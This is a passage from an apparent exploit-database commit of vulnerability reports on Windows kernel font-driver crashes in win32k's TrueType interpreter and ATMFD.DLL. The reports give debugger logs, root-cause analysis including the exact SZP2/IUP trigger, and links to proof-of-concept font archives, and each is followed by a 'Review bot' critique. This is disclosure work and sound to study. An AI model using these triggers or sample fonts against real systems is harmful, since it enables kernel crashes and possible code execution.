Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 91f4a4f1, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
[...]
FAULTING_IP:
win32k!itrp_IUP+2fb
91f4a4f1 8904b2 mov dword ptr [edx+esi*4],eax
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 91f4bc79 to 91f4a4f1
STACK_TEXT:
8adcf3b8 91f4bc79 00000001 91f517d3 00000000 win32k!itrp_IUP+0x2fb
8adcf3c0 91f517d3 00000000 ff64eb28 00b61838 win32k!itrp_InnerExecute+0x38
8adcf3f8 91f4bc79 ff64eb28 91f4f088 ff64ebbc win32k!itrp_CALL+0x23b
8adcf400 91f4f088 ff64ebbc ff64eb84 ff64f95c win32k!itrp_InnerExecute+0x38
8adcf480 91f53234 00b61804 00b61838 ff64eb28 win32k!itrp_Execute+0x2b2
8adcf4a8 91f529dc 00b61804 00b61838 ff64eb28 win32k!itrp_ExecuteGlyphPgm+0x4a
8adcf4dc 91f51e5e ff64a570 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x102
8adcf574 91f5238c ff64a250 ff64b73c ff64eb28 win32k!fsg_ExecuteGlyph+0x1ce
8adcf5d0 91f52202 ff64a250 ff64eb28 ff64b6b4 win32k!fsg_CreateGlyphData+0xea
8adcf610 91f4f419 ff64a250 ff64eb28 ff64a2c4 win32k!fsg_GridFit+0x4d
8adcf688 91f5906c 00000001 8adcf6a4 91f58fc3 win32k!fs__Contour+0x287
8adcf694 91f58fc3 ff64a010 ff64a07c 8adcf6c0 win32k!fs_ContourGridFit+0x12
8adcf6a4 91f5991f ff64a010 ff64a07c 00000027 win32k!fs_NewContourGridFit+0x10
8adcf6c0 91f59960 fb8b0e78 00000027 8adcf6fc win32k!bGetGlyphOutline+0xd7
8adcf6e8 91f59b59 fb8b0e78 00000027 00000001 win32k!bGetGlyphMetrics+0x20
8adcf82c 91f4ec63 fb8b0e78 00000027 8adcf918 win32k!lGetGlyphBitmap+0x2b
8adcf850 91f4eab6 00000000 00000001 00000027 win32k!ttfdQueryFontData+0x158
8adcf8a0 91f4dce2 ff7af010 fba32cf0 00000001 win32k!ttfdSemQueryFontData+0x45
8adcf8e8 91f53774 ff7af010 fba32cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
8adcf960 91fcbc8d 8adcfc3c fb87ec00 ff6470cc win32k!xInsertMetricsPlusRFONTOBJ+0x120
8adcf990 91f4594d 0000000a ff7bf000 8adcfcd0 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
8adcf9c8 91fcb78b 8adcfc1c 8adcfc3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
8adcfa0c 91f455d0 8adcfcd0 0000000a 8adcfc1c win32k!ESTROBJ::vInit+0x268
8adcfc2c 91f45793 00000000 8adcfcd0 fba32cf0 win32k!GreGetTextExtentExW+0x12a
8adcfd0c 82657896 0801016f 02d90bac 0000000a win32k!NtGdiGetTextExtentExW+0x141
8adcfd0c 77b370f4 0801016f 02d90bac 0000000a nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0021f6c4 00000000 00000000 00000000 00000000 0x77b370f4
---
Depending on the malformed font file, the crashes occur at various locations in the win32k!itrp_IUP function, such as:
win32k!itrp_IUP+141: test [esi+edx], cl
win32k!itrp_IUP+173: test [eax+edx], cl
win32k!itrp_IUP+17b: mov eax, [ecx+ebx*4]
win32k!itrp_IUP+184: mov ecx, [ecx]
win32k!itrp_IUP+213: mov eax, [ebx]
win32k!itrp_IUP+2c9: mov eax, [eax+esi*4]
win32k!itrp_IUP+2fb: mov [edx+esi*4], eax
win32k!itrp_IUP+317: add [eax+esi*4], edx
This is caused by the fact that the function operates (reads from and writes to) on memory well beyond of the dynamically allocated buffers, leading to a pool-based buffer overflow of controlled size and content, consequently allowing for remote code execution in the context of the Windows kernel.
It appears that the culprit of the vulnerability is the lack of handling of a corner case explicitly mentioned in the "The TrueType Instruction Set, Part 2" specification [1]:
"This instruction operates on points in the glyph zone pointed to by zp2. This zone should almost always be zone 1. Applying IUP to zone 0 is an error."
Every testcase we have examined contains an SZP2[] instruction ("Set Zone Pointer 2") with a 0 argument followed by the IUP[] instruction later on in the TTF program. The faulty instruction stream has the same outcome regardless of its location (i.e. font pre-program, glyph program etc.).
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation in the form of a crash in win32k!itrp_IUP or another location in kernel space, as caused by the corrupted pool state, depending on the specific testcase used.
Attached is an archive with eight sample files, each crashing at a different location in the win32k!itrp_IUP function on Windows 7 32-bit, together with corresponding kernel crash logs.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37919.zip
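Review bot: typo in the analysis paragraph, "on memory well beyond of the dynamically allocated buffers" should read "on memory well beyond the dynamically allocated buffers". The spec quotation is cited as "The TrueType Instruction Set, Part 2" specification [1], but no "[1]" reference entry appears anywhere in this file as rendered, so either add the reference (title and URL) or drop the bracket. The root-cause sentence (every sample contains "an SZP2[] instruction ("Set Zone Pointer 2") with a 0 argument followed by the IUP[] instruction") is the most actionable line of the report and deserves to be pulled up next to the crash-location list, since together with the quoted "Applying IUP to zone 0 is an error" it tells a reader both how to spot such a font and what the interpreter should have rejected.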

platforms/windows/dos/37920.txt Executable file

@ -0,0 +1,112 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=385&can=1
We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: a3a3a3db, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 91f445c9, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000002, (reserved)
Debugging Details:
------------------
*** ERROR: Module load completed but symbols could not be loaded for ATMFD.DLL
WRITE_ADDRESS: a3a3a3db
FAULTING_IP:
ATMFD+345c9
91f445c9 83483810 or dword ptr [eax+38h],10h
MM_INTERNAL_CODE: 2
IMAGE_NAME: ATMFD.DLL
DEBUG_FLR_IMAGE_TIMESTAMP: 54e6a55a
MODULE_NAME: ATMFD
FAULTING_MODULE: 91f10000 ATMFD
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 2
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
TRAP_FRAME: 879cfd8c -- (.trap 0xffffffff879cfd8c)
ErrCode = 00000002
eax=a3a3a3a3 ebx=00000008 ecx=00000004 edx=fb964900 esi=fb80e380 edi=fb80e3a0
eip=91f445c9 esp=879cfe00 ebp=879cfe10 iopl=0 nv up ei ng nz ac pe cy
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010297
ATMFD+0x345c9:
91f445c9 83483810 or dword ptr [eax+38h],10h ds:0023:a3a3a3db=????????
Resetting default scope
LAST_CONTROL_TRANSFER: from 826f4ce7 to 826902d8
STACK_TEXT:
879cf8dc 826f4ce7 00000003 5e64199c 00000065 nt!RtlpBreakWithStatusInstruction
879cf92c 826f57e5 00000003 c06028e8 a3a3a3db nt!KiBugCheckDebugBreak+0x1c
879cfcf0 826a3391 00000050 a3a3a3db 00000001 nt!KeBugCheck2+0x68b
879cfd74 82655c48 00000001 a3a3a3db 00000000 nt!MmAccessFault+0x104
879cfd74 91f445c9 00000001 a3a3a3db 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
879cfe10 91f39eec fb964900 ff657038 91f563ec ATMFD+0x345c9
879cfe34 91f3e987 fb9bec70 91f563ec 00000f5c ATMFD+0x29eec
879d0544 91f3f6e0 fb9bec70 91f4f028 879d0790 ATMFD+0x2e987
879d0600 91f327ae fb9bec70 91f4f028 879d0790 ATMFD+0x2f6e0
879d06ec 91f32858 fb9bec70 879d0790 879d0814 ATMFD+0x227ae
879d0718 91f232b2 fb9bec70 91f4f028 879d0790 ATMFD+0x22858
879d087c 91f23689 ffffffff 879d099c fb874f58 ATMFD+0x132b2
879d08d0 91f1406d ffffffff 879d099c 00000000 ATMFD+0x13689
879d0924 91c7dcf2 ff7a5010 fbeeccf0 00000001 ATMFD+0x406d
879d096c 91c667cb ff7a5010 fbeeccf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
879d09e0 91c91513 ffa6a130 fb81e8d0 0000004f win32k!xInsertMetricsRFONTOBJ+0x9c
879d0a14 91c935f5 00000020 879d0b2c 879d0c92 win32k!RFONTOBJ::bGetGlyphMetrics+0x131
879d0cb8 91ca6684 040101b7 00000060 00000040 win32k!GreGetCharABCWidthsW+0x147
879d0d14 82652a66 040101b7 00000040 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
879d0d14 771870f4 040101b7 00000040 00000040 nt!KiSystemServicePostCall
0012f1d4 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---
The crash occurs while trying to modify memory under an invalid address. More specifically, the "a3a3a3a3" bytes found in the EAX register at the time of the crash are a repetition of a random byte filled by Driver Verifier in each pool allocation before returning it to the caller. This means that the dereferenced pointer is in fact an uninitialized value from the kernel pool.
The offending code (containing the crashing instruction) is as follows:
---
.text:000445C6 loc_445C6:
.text:000445C6 mov eax, [esi+ecx*4]
.text:000445C9 or dword ptr [eax+38h], 10h
.text:000445CD inc ecx
.text:000445CE cmp ecx, ebx
.text:000445D0 jl short loc_445C6
---
As shown above, there is a loop iterating EBX times over an array of addresses stored in [ESI]. At the time of the bugcheck, EBX=8, so the code expects 8 valid pointers in the array; however, only 4 pointers are properly initialized:
---
kd> dd fb80e380
fb80e380 fb964980 fb9649c0 fb964900 fb964940
fb80e390 a3a3a3a3 a3a3a3a3 a3a3a3a3 a3a3a3a3
fb80e3a0 a3a3a3a3 a3a3a3a3 a3a3a3a3 a3a3a3a3
---
The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it should also be possible to observe a crash on a default Windows installation in ATMFD.DLL.
Attached is an archive with two proof of concept font files together with corresponding kernel crash logs.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37920.zip
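Review bot: this is the only report in the batch that draws no conclusion about impact; the faulting instruction "or dword ptr [eax+38h],10h" is a write ("Arg2: 00000001") through a pointer that the analysis shows to be an uninitialised pool value (the 0xa3a3a3a3 entries in the "dd fb80e380" dump, with EBX=8 but only four entries initialised), so the closing paragraph should state what that amounts to, at least a kernel write through a pointer taken from stale pool contents, rather than leaving it implicit. The reproduction line says only "The issue reproduces on Windows 7." while the neighbouring ATMFD reports list Windows 7 and 8.1; say whether 8.1 was tested and did not reproduce, or was not tested. Minor: the loop description ("iterating EBX times over an array of addresses stored in [ESI]") would be easier to tie to the disassembly if the register dump line "eax=a3a3a3a3 ebx=00000008 ecx=00000004 ... esi=fb80e380" were referenced explicitly, since ecx=4 is exactly the index of the first uninitialised entry.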

platforms/windows/dos/37921.txt Executable file

@ -0,0 +1,120 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=384&can=1
We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: fff82008, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 91a3440b, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
*** ERROR: Module load completed but symbols could not be loaded for ATMFD.DLL
READ_ADDRESS: fff82008
FAULTING_IP:
ATMFD+3440b
91a3440b 8b7e08 mov edi,dword ptr [esi+8]
MM_INTERNAL_CODE: 0
IMAGE_NAME: ATMFD.DLL
DEBUG_FLR_IMAGE_TIMESTAMP: 54e6a55a
MODULE_NAME: ATMFD
FAULTING_MODULE: 91a00000 ATMFD
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 2
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
TRAP_FRAME: 97ff8d54 -- (.trap 0xffffffff97ff8d54)
ErrCode = 00000000
eax=ff677018 ebx=00000001 ecx=00000001 edx=0000000b esi=fff82000 edi=fb63e940
eip=91a3440b esp=97ff8dc8 ebp=97ff8de8 iopl=0 nv up ei ng nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286
ATMFD+0x3440b:
91a3440b 8b7e08 mov edi,dword ptr [esi+8] ds:0023:fff82008=????????
Resetting default scope
LAST_CONTROL_TRANSFER: from 82724ce7 to 826c02d8
STACK_TEXT:
97ff88a4 82724ce7 00000003 4b979438 00000065 nt!RtlpBreakWithStatusInstruction
97ff88f4 827257e5 00000003 00000000 00000000 nt!KiBugCheckDebugBreak+0x1c
97ff8cb8 826d3391 00000050 fff82008 00000000 nt!KeBugCheck2+0x68b
97ff8d3c 82685c48 00000000 fff82008 00000000 nt!MmAccessFault+0x104
97ff8d3c 91a3440b 00000000 fff82008 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
97ff8de8 91a345f7 fb6ba380 0000000b fb6ba3ac ATMFD+0x3440b
97ff8e10 91a29eec fb63e8c0 ff6770d8 91a463ec ATMFD+0x345f7
97ff8e34 91a2e987 fb8f4c70 91a463ec 00000f5c ATMFD+0x29eec
97ff9544 91a2f6e0 fb8f4c70 91a3f028 97ff9790 ATMFD+0x2e987
97ff9600 91a227ae fb8f4c70 91a3f028 97ff9790 ATMFD+0x2f6e0
97ff96ec 91a22858 fb8f4c70 97ff9790 97ff9814 ATMFD+0x227ae
97ff9718 91a132b2 fb8f4c70 91a3f028 97ff9790 ATMFD+0x22858
97ff987c 91a13689 ffffffff 97ff999c fb68af58 ATMFD+0x132b2
97ff98d0 91a0406d ffffffff 97ff999c 00000000 ATMFD+0x13689
97ff9924 91b2dcf2 ff7a5010 fb700cf0 00000001 ATMFD+0x406d
97ff996c 91b167cb ff7a5010 fb700cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
97ff99e0 91b41513 ffa6a130 fb93cb14 000000e0 win32k!xInsertMetricsRFONTOBJ+0x9c
97ff9a14 91b435f5 00000020 97ff9a3c 97ff9c74 win32k!RFONTOBJ::bGetGlyphMetrics+0x131
97ff9cb8 91b56684 020101c3 00000100 00000020 win32k!GreGetCharABCWidthsW+0x147
97ff9d14 82682a66 020101c3 000000c0 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
97ff9d14 76ee70f4 020101c3 000000c0 00000040 nt!KiSystemServicePostCall
002cf224 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---
The crash represents a read from invalid memory; prior to being dereferenced as an address, the ESI register is loaded with a value from EAX+0x30 (on 32-bit Windows), which points into an "Adbe" pool allocation:
---
0: kd> !pool 9d619018
Pool page 9d619018 region is Paged session pool
9d619000 is not a valid large pool allocation, checking large session pool...
*9d619000 : large page allocation, Tag is Adbe, size is 0x4018 bytes
Pooltag Adbe : Adobe's font driver
---
The surrounding code is a loop over a linked list of structures; the ESI register at the time of the crash holds a [F/B]link address which points to unmapped memory, potentially suggesting that the root cause of the crash is a use-after-free condition, or some kind of corruption of the linked list. Since the invalid address is later used to manipulate memory, we expect that this issue could be used to achieve remote code execution in the security context of the Windows kernel.
Moreover, we have also encountered similar crashes one instruction further in the code - in these cases, ESI turned out to accidentally point to mapped memory, but its contents did not correspond to the ATMFD's expectations (reinforcing the use-after-free hypothesis), thus resulting in an attempt to dereference a completely wild memory address, e.g.:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: eebd8451, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 9205440e, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000002, (reserved)
---
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it should also be possible to observe a crash on a default Windows installation in ATMFD.DLL.
Note that this crash is very similar in its nature to Issue 383 (invalid memory access while traversing a linked list of "Adbe" structures); however, due to uncertainty about the reason of the crash and the different stack traces, I am filing this as a separate report for now.
Attached is an archive with six proof of concept font files (three for each crash location) together with corresponding kernel crash logs.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37921.zip
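Review bot: the pool dump does not match the crash it is meant to explain: the trap frame shows eax=ff677018 and the text says ESI "is loaded with a value from EAX+0x30", but the dump is "!pool 9d619018", an address that appears nowhere in the log above it, so it evidently comes from a different reproduction run; either re-run the dump on the EAX from the shown trap frame or say explicitly that it is from another crash, otherwise the "Adbe" attribution cannot be checked against the rest of the log. The cross-reference "very similar in its nature to Issue 383" names the Google tracker id only; the report filed from that issue is platforms/windows/dos/37922.txt in this same commit, and a pointer to it here would let readers compare the two linked-list crashes directly. Minor wording: "ESI turned out to accidentally point to mapped memory" reads better as "ESI happened to point to mapped memory".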

platforms/windows/dos/37922.txt Executable file

@ -0,0 +1,164 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=383&can=1
We have encountered a Windows kernel crash in the ATMFD.DLL OpenType driver while processing a corrupted OTF font file:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff67a024, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 98b54072, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
*** ERROR: Module load completed but symbols could not be loaded for ATMFD.DLL
READ_ADDRESS: ff67a024 Paged session pool
FAULTING_IP:
ATMFD+34072
98b54072 8b700c mov esi,dword ptr [eax+0Ch]
MM_INTERNAL_CODE: 0
IMAGE_NAME: ATMFD.DLL
DEBUG_FLR_IMAGE_TIMESTAMP: 54e6a55a
MODULE_NAME: ATMFD
FAULTING_MODULE: 98b20000 ATMFD
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 2
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
TRAP_FRAME: 9d793d9c -- (.trap 0xffffffff9d793d9c)
ErrCode = 00000000
eax=ff67a018 ebx=fbea4830 ecx=00000000 edx=00000000 esi=fbffe7c0 edi=fbffe7c0
eip=98b54072 esp=9d793e10 ebp=9d793e38 iopl=0 nv up ei pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202
ATMFD+0x34072:
98b54072 8b700c mov esi,dword ptr [eax+0Ch] ds:0023:ff67a024=????????
Resetting default scope
LAST_CONTROL_TRANSFER: from 82714ce7 to 826b02d8
STACK_TEXT:
9d7938ec 82714ce7 00000003 8d6243ee 00000065 nt!RtlpBreakWithStatusInstruction
9d79393c 827157e5 00000003 00000000 00002522 nt!KiBugCheckDebugBreak+0x1c
9d793d00 826c3391 00000050 ff67a024 00000000 nt!KeBugCheck2+0x68b
9d793d84 82675c48 00000000 ff67a024 00000000 nt!MmAccessFault+0x104
9d793d84 98b54072 00000000 ff67a024 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
9d793e38 98b4d5b5 fbffe7c0 fbea4830 00000f5c ATMFD+0x34072
9d794544 98b4f6e0 fbbfac70 98b5f028 9d794790 ATMFD+0x2d5b5
9d794600 98b427ae fbbfac70 98b5f028 9d794790 ATMFD+0x2f6e0
9d7946ec 98b42858 fbbfac70 9d794790 9d794814 ATMFD+0x227ae
9d794718 98b332b2 fbbfac70 98b5f028 9d794790 ATMFD+0x22858
9d79487c 98b33689 0000000b 9d79499c fad3ef00 ATMFD+0x132b2
9d7948d0 98b2406d 0000000b 9d79499c 00000000 ATMFD+0x13689
9d794924 9888dcf2 ff7a5010 fad30cf0 00000001 ATMFD+0x406d
9d79496c 988767cb ff7a5010 fad30cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
9d7949e0 988a1513 ffa6a130 fb23bd40 0000134b win32k!xInsertMetricsRFONTOBJ+0x9c
9d794a14 988a35f5 00000020 9d794aec 9d794c8a win32k!RFONTOBJ::bGetGlyphMetrics+0x131
9d794cb8 988b6684 0c010385 00001360 00000040 win32k!GreGetCharABCWidthsW+0x147
9d794d14 82672a66 0c010385 00001340 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
9d794d14 772b70f4 0c010385 00001340 00000040 nt!KiSystemServicePostCall
0017ed34 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---
The crash represents a read from invalid memory; prior to being dereferenced as an address, the EAX register is loaded with a value from ESI+0x34 (on 32-bit Windows), which points into an "Adbe" pool allocation:
---
kd> !pool fbffe7c0
Pool page fbffe7c0 region is Special pool
Address fbffe000 does not belong to any pool
*fbffe000 size: 898 data: fbffe768 (Paged session) *Adbe
Pooltag Adbe : Adobe's font driver
---
The crash is always caused by an attempt to access memory at a constant offset past the memory page boundary (0x24 on 32-bit platforms), and the surrounding code is a loop over a linked list of structures. The EAX register at the time of the crash holds a [F/B]link address which points to unmapped memory, potentially suggesting that the root cause of the crash is a use-after-free condition, or some kind of corruption of the linked list. Since the invalid address is later used to manipulate memory, we expect that this issue could be used to achieve remote code execution in the security context of the Windows kernel.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it should also be possible to observe a crash on a default Windows installation in ATMFD.DLL.
Attached is an archive with a proof of concept font file together with a corresponding kernel crash log.
------------------------------------------------------------------------------------------------------------------------------------------
We have also encountered a number of crashes where the read operation discussed above succeeds (moving the contents of [eax+0Ch] to esi), and a respective attempt to access the [esi+34h] address fails a few instructions later; for example:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: fffb8034, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 9486407b, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
Could not read faulting driver name
READ_ADDRESS: GetPointerFromAddress: unable to read from 8278184c
Unable to read MiSystemVaType memory at 82760f00
fffb8034
FAULTING_IP:
ATMFD+3407b
9486407b 394e34 cmp dword ptr [esi+34h],ecx
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 9485d5b5 to 9486407b
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
879d7e38 9485d5b5 fba78880 fbbb6830 00000f5c ATMFD+0x3407b
879d8544 9485f6e0 fbad2c70 9486f028 879d8790 ATMFD+0x2d5b5
879d8600 948527ae fbad2c70 9486f028 879d8790 ATMFD+0x2f6e0
879d86ec 94852858 fbad2c70 879d8790 879d8814 ATMFD+0x227ae
879d8718 948432b2 fbad2c70 9486f028 879d8790 ATMFD+0x22858
879d887c 94843689 00000002 879d899c fbafaf58 ATMFD+0x132b2
879d88d0 9483406d 00000002 879d899c 00000000 ATMFD+0x13689
879d8924 9499dce2 ff7af010 fc01acf0 00000001 ATMFD+0x406d
879d896c 949867bb ff7af010 fc01acf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
879d89e0 949b14d7 ffa66130 ff646084 0000201c win32k!xInsertMetricsRFONTOBJ+0x9c
879d8a14 949b35b9 00000020 879d8bfc 879d8cac win32k!RFONTOBJ::bGetGlyphMetrics+0x131
879d8cb8 949c6644 10010188 00002020 00000040 win32k!GreGetCharABCWidthsW+0x147
879d8d14 82654896 10010188 00002000 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
879d8d14 776f70f4 10010188 00002000 00000040 nt!KiSystemServicePostCall
001bf3e4 00000000 00000000 00000000 00000000 0x776f70f4
---
Attached are further three samples together with corresponding crash log files, which reproduce the issue at the ATMFD+0x3407b location.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37922.zip
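Review bot: the remote-code-execution claim at the end of the first analysis paragraph rests on "the invalid address is later used to manipulate memory", but neither crash log in this entry shows that later access; the first fault is described as "a read from invalid memory" and the second has Arg2 00000000 (read), so either quote the subsequent write or dereference that makes this exploitable, or soften the wording to a potential memory-safety issue pending further analysis. Two smaller points: both stack traces carry "Stack unwind information not available. Following frames may be wrong." for the ATMFD frames, which is worth stating next to the claim that the further three samples "reproduce the issue at the ATMFD+0x3407b location", since those offsets are only as reliable as that unwind; and the reproduction note says Special Pools was enabled for ATMFD.DLL without recording the Driver Verifier configuration used or the ATMFD.DLL build the offsets belong to, which would help anyone matching the four attached samples to the two crash sites described.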

platforms/windows/dos/37923.txt Executable file
@ -0,0 +1,91 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=382&can=1
We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as:
---
DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: ffb4da9f, memory referenced
Arg2: 00000000, value 0 = read operation, 1 = write operation
Arg3: 92a7a902, if non-zero, the address which referenced memory.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
READ_ADDRESS: ffb4da9f Special pool
FAULTING_IP:
ATMFD+2a902
92a7a902 0fb600 movzx eax,byte ptr [eax]
MM_INTERNAL_CODE: 0
IMAGE_NAME: ATMFD.DLL
DEBUG_FLR_IMAGE_TIMESTAMP: 54e6a55a
MODULE_NAME: ATMFD
FAULTING_MODULE: 92a50000 ATMFD
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0xD6
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 2
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
TRAP_FRAME: 945bcd54 -- (.trap 0xffffffff945bcd54)
ErrCode = 00000000
eax=ffb4da9f ebx=945bd0ec ecx=ffb4da9f edx=ffb4dea8 esi=945bd2fc edi=00002932
eip=92a7a902 esp=945bcdc8 ebp=945bd4c0 iopl=0 nv up ei pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202
ATMFD+0x2a902:
92a7a902 0fb600 movzx eax,byte ptr [eax] ds:0023:ffb4da9f=??
Resetting default scope
LAST_CONTROL_TRANSFER: from 82723ce7 to 826bf2d8
STACK_TEXT:
945bc8a4 82723ce7 00000003 46aca596 00000065 nt!RtlpBreakWithStatusInstruction
945bc8f4 827247e5 00000003 00000000 00000002 nt!KiBugCheckDebugBreak+0x1c
945bccb8 826d2391 00000050 ffb4da9f 00000000 nt!KeBugCheck2+0x68b
945bcd3c 82684c48 00000000 ffb4da9f 00000000 nt!MmAccessFault+0x104
945bcd3c 92a7a902 00000000 ffb4da9f 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
945bd4c0 92a7f6e0 fab90c70 92a8f028 945bd70c ATMFD+0x2a902
945bd57c 92a727ae fab90c70 92a8f028 945bd70c ATMFD+0x2f6e0
945bd668 92a72858 fab90c70 945bd70c 945bd790 ATMFD+0x227ae
945bd694 92a632b2 fab90c70 92a8f028 945bd70c ATMFD+0x22858
945bd7f8 92a63689 0000000b 945bd918 fb64c8b0 ATMFD+0x132b2
945bd84c 92a5406d 0000000b 945bd918 fb64c8b0 ATMFD+0x13689
945bd8a0 92badcf2 ff7a5010 fa4f4cf0 00000001 ATMFD+0x406d
945bd8e8 92bb3784 ff7a5010 fa4f4cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
945bd960 92c2bdcd 945bdc3c fb665704 fb64c8b0 win32k!xInsertMetricsPlusRFONTOBJ+0x120
945bd990 92ba5964 00000003 ff7bf020 945bdcd4 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
945bd9c8 92c2b8cb 945bdc1c 945bdc3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
945bda0c 92ba55e7 945bdcd0 00000003 945bdc1c win32k!ESTROBJ::vInit+0x268
945bdc2c 92ba57aa 00000000 945bdcd0 fa4f4cf0 win32k!GreGetTextExtentExW+0x12a
945bdd0c 82681a66 20010483 00b20b1c 00000003 win32k!NtGdiGetTextExtentExW+0x141
945bdd0c 773c70f4 20010483 00b20b1c 00000003 nt!KiSystemServicePostCall
0031f6d4 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---
